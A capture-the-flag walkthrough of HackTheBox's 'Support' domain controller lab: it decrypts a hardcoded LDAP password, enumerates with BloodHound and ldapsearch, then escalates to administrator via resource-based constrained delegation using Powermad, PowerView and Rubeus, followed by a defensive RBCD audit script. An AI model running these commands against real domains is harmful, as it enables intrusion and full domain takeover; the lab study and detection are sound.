SUPPORT – HACKTHEBOX
This is the Writeup/Walkthrough of the SUPPORT Machine from Hackthebox.
nmap scan:
53/tcp open domain? syn-ack
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-08 06:33:49Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 19493/tcp): CLEAN (Timeout)
| Check 2 (port 32384/tcp): CLEAN (Couldn't connect)
| Check 3 (port 45724/udp): CLEAN (Timeout)
| Check 4 (port 13515/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_smb2-time: Protocol negotiation failed (SMB2)
On SMB I found 3 shares. In the support-tools directory I downloaded UserInfo.exe.zip, extracted all the files, and used dnSpy to debug UserInfo.exe. After debugging I found the encrypted password used for the LDAP query, together with its key:
To decrypt the password, I used ChatGPT to reverse the code:
import base64

# values recovered from UserInfo.exe with dnSpy
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando"

def decrypt_password():
    decoded_password = base64.b64decode(enc_password)
    decrypted_bytes = bytearray(len(decoded_password))
    for i in range(len(decoded_password)):
        # each byte is XORed with the repeating key and with the constant 223 (0xDF)
        decrypted_bytes[i] = decoded_password[i] ^ ord(key[i % len(key)]) ^ 223
    return decrypted_bytes.decode('utf-8')

decrypted_password = decrypt_password()
print("Decrypted Password:", decrypted_password)
I got the password of the ldap user. After that I enumerated the users and the domain with BloodHound using the password I had found, but didn't find anything interesting except that the user "support" can PSRemote into the DC.
./bloodhound.py -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -ns 10.10.11.174 --zip -c All
After the collection finished, I uploaded the zip file into BloodHound. The support user can PSRemote into the DC, which means that if I get the support user I can get onto the DC without any further credentials.
After enumerating many things I didn't find anything that gave a foothold as the support user. After that I tried searching the OUs in support.htb using ldapsearch, and there I found the password of the support user:
ldapsearch -H ldap://10.10.11.174 -b "dc=support,dc=htb" -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' > ldap_search
I opened the output with mousepad and searched for the Common Name "CN=support,CN=Users". I had already found in BloodHound that there is a support user, so I searched for this specific user and found the password.
After getting the password of the support user, I logged in using evil-winrm, ran SharpHound.exe again and uploaded the data to BloodHound. Looking for the shortest path to Domain Admin, I found as above that the user can PSRemote into DC.SUPPORT.HTB, but I don't have credentials for administrator. Looking further, under the support user's OUTBOUND OBJECT CONTROL > GROUP DELEGATED OBJECT CONTROL, I found that the support user is a member of Shared Support Account, and this group has GenericAll over DC.SUPPORT.HTB.
Abusing GenericAll: to do this, I uploaded Powermad.ps1, PowerView.ps1 and Rubeus.exe to the support user's Desktop folder.
# adding a new machine account to the domain (Powermad)
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
# getting the SID of the new computer account (PowerView)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
# building a generic ACE with the attacker-added computer SID
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# setting the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the DC
Get-DomainComputer dc.support.htb | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
# getting the RC4 (NTLM) hash of the plaintext password (Rubeus)
.\Rubeus.exe hash /password:Summer2018!
Copy the RC4 hash, then use the Rubeus s4u module to get a service ticket for the CIFS service on the DC while impersonating administrator:
.\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
After getting the ticket, I copied it, saved it into a file, base64-decoded it and converted it with impacket-ticketConverter to a ccache file.
After converting the ticket, I used it to log in as administrator with impacket-psexec (psexec.py can also be used).
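The defender's counterpart to the RBCD abuse above, added here as an example and not part of the original writeup: it audits every computer object in the domain for a populated msDS-AllowedToActOnBehalfOfOtherIdentity attribute, decodes the descriptor that Set-DomainObject wrote, and reports the machine-account quota that let New-MachineAccount succeed. It assumes the RSAT ActiveDirectory module in a domain-joined session; the function name Get-RbcdDelegations is mine.

```powershell
# Added defensive example, not code from the writeup. Requires the RSAT
# ActiveDirectory module and a session that can read the domain.
Import-Module ActiveDirectory

function Get-RbcdDelegations {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)

    $attr = 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    $computers = Get-ADComputer -Filter * -SearchBase $SearchBase -Properties $attr

    foreach ($c in $computers) {
        $raw = $c.$attr
        if (-not $raw) { continue }   # attribute empty: nothing delegated to this host

        # The AD module normally returns the attribute as ActiveDirectorySecurity;
        # if it comes back as the raw binary descriptor, decode it the same way
        # PowerView built it (RawSecurityDescriptor -> binary form).
        $acl = $raw
        if ($raw -is [byte[]]) {
            $acl = New-Object System.DirectoryServices.ActiveDirectorySecurity
            $acl.SetSecurityDescriptorBinaryForm($raw)
        }
        foreach ($ace in $acl.Access) {
            [pscustomobject]@{
                Computer  = $c.Name
                AllowedAs = $ace.IdentityReference.Value   # e.g. SUPPORT\attackersystem$
                Rights    = $ace.ActiveDirectoryRights
                Type      = $ace.AccessControlType
            }
        }
    }
}

# On a domain controller this attribute should normally be empty; any entry
# pointing at a freshly created machine account is the pattern shown above.
Get-RbcdDelegations | Format-Table -AutoSize

# The quota that allowed an ordinary user to add 'attackersystem' (default 10).
$domainDn = (Get-ADDomain).DistinguishedName
Get-ADObject -Identity $domainDn -Properties 'ms-DS-MachineAccountQuota' |
    Select-Object -ExpandProperty 'ms-DS-MachineAccountQuota'

# Remediation, commented out so the audit stays read-only:
# Set-ADComputer -Identity 'dc' -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity'
# Set-ADObject -Identity $domainDn -Replace @{'ms-DS-MachineAccountQuota' = 0}
```

Event ID 5136 (directory object modified) on the DC records writes to this attribute, so alerting on changes to it for DC computer objects catches the step regardless of which tool performed it.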